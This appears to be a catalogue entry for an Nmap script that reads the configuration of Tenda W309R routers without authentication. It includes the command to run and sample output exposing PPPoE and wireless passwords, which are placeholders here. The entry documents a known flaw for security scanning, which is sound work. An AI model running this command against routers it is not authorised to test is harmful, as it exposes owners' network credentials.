Tenda W309R allows an attacker to access the configuration detailed with no authentication. Firmware Tested : V5.07.46
Ports
Any
Protocols
n/a
Attribution
Sanoop Thomas a.k.a @s4n7h0 (upstream: s4n7h0/NSE)
Copy the command and adjust the target or script arguments as needed.
nmap host --script http-tenda --script-args user=tenda
80/tcp open http
| http-tenda:
| PPPoE Username : home_user
| PPPoE Password : 12345
| Wireless Password : 12345678
| Clone MAC : AA:AA:AA:AA:AA:AA
|_ Face MAC : BB:BB:BB:BB:BB:BB
-Imported from the upstream repository s4n7h0/NSE. Tenda W309R allows an attacker to access the configuration detailed with no authentication. Firmware Tested : V5.07.46 Thanks & Credits : Mahesh Gavkar, Samandeep Singh (@samanL33T), Amit Ghadigaonkar